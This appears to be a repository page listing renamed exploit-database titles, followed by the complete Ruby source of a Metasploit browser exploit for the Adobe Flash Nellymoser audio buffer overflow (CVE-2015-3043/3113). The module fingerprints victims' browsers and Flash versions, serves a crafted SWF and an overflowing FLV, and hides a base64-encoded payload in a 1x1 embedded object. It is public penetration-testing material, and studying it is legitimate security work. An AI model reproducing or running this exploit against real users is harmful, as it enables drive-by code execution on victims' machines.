Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)

Western Digital Arkeia - Remote Code Execution (Metasploit) (2)
Western Digital Arkeia < 11.0.12 - Remote Code Execution (Metasploit)

Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) (1)

E-Uploader Pro 1.0 - Image Upload with Code Execution
E-Uploader Pro 1.0 - Image Upload / Code Execution

ASPapp Knowledge Base - 'CatId' Parameter SQL Injection
ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (1)

ASPapp KnowledgeBase - 'catid' Parameter SQL Injection
ASPapp Knowledge Base - 'CatId' Parameter SQL Injection (2)

ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99)
ea-gBook 0.1 - Remote Command Execution / Remote File Inclusion (c99)

Flatchat 3.0 - 'pmscript.php with' Local File Inclusion
Flatchat 3.0 - 'pmscript.php' Local File Inclusion

Joomla! Component huruhelpdesk - SQL Injection
Joomla! Component Huru Helpdesk - SQL Injection (1)

PGAUTOPro - SQL Injection / Cross-Site Scripting
PGAUTOPro - SQL Injection / Cross-Site Scripting (1)

Joomla! Component Huru Helpdesk - SQL Injection
Joomla! Component Huru Helpdesk - SQL Injection (2)

SoftwareDEP Classified Script 2.5 - SQL Injection
SoftwareDEP Classified Script 2.5 - SQL Injection (1)

WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities
WordPress Plugin Pay with Tweet 1.1 - Multiple Vulnerabilities

Software DEP Classified Script 2.5 - SQL Injection
SoftwareDEP Classified Script 2.5 - SQL Injection (2)
Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (1)
Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2)
Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (1)
Virtual Programming VP-ASP 5.00 - 'shopexd.asp' SQL Injection (2)

OnlineArts DailyDose 1.1 - Denial of Servicee.pl Remote Command Execution
OnlineArts DailyDose 1.1 - 'dose.pl' Remote Command Execution
PHPOpenChat 2.3.4/3.0.1 - PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion
PHPOpenChat 2.3.4/3.0.1 - PoC.php Remote File Inclusion
PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php' phpbb_root_path Parameter Remote File Inclusion
PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion

ActiveNews Manager - 'articleId' Parameter SQL Injection
ActiveNews Manager - 'articleId' Parameter SQL Injection (1)

Active News Manager - 'articleId' Parameter SQL Injection
ActiveNews Manager - 'articleId' Parameter SQL Injection (2)

Sagem Fast 3304-V2 - Authentication Bypass
Sagem Fast 3304-V2 - Authentication Bypass (1)

PG Auto Pro - SQL Injection / Cross-Site Scripting
PGAUTOPro - SQL Injection / Cross-Site Scripting (2)

Sagem FAST3304-V2 - Authentication Bypass
Sagem FAST3304-V2 - Authentication Bypass (2)

Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe
Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Issues

phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers)
phpATM 1.32 (Windows) - Arbitrary File Upload / Remote Command Execution

Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)
2017-04-02 05:01:18 +00:00

191 lines
No EOL
6.7 KiB
Ruby
Executable file
Raw Blame History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3043'],
['CVE', '2015-3113'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
['URL', 'http://bobao.360.cn/learning/detail/357.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 23 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
@flv = create_flv
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
if request.uri =~ /\.flv$/
print_status('Sending FLV...')
send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
def create_flv
header = ''
header << 'FLV' # signature
header << [1].pack('C') # version
header << [4].pack('C') # Flags: TypeFlagsAudio
header << [9].pack('N') # DataOffset
data = ''
data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
data << "\xee" * 0x440 # SoundData
tag1 = ''
tag1 << [8].pack('C') # TagType (audio)
tag1 << "\x00\x04\x41" # DataSize
tag1 << "\x00\x00\x1a" # TimeStamp
tag1 << [0].pack('C') # TimeStampExtended
tag1 << "\x00\x00\x00" # StreamID, always 0
tag1 << data
body = ''
body << [0].pack('N') # PreviousTagSize
body << tag1
body << [0xeeeeeeee].pack('N') # PreviousTagSize
flv = ''
flv << header
flv << body
flv
end
end
Reference in a new issue View git blame Copy permalink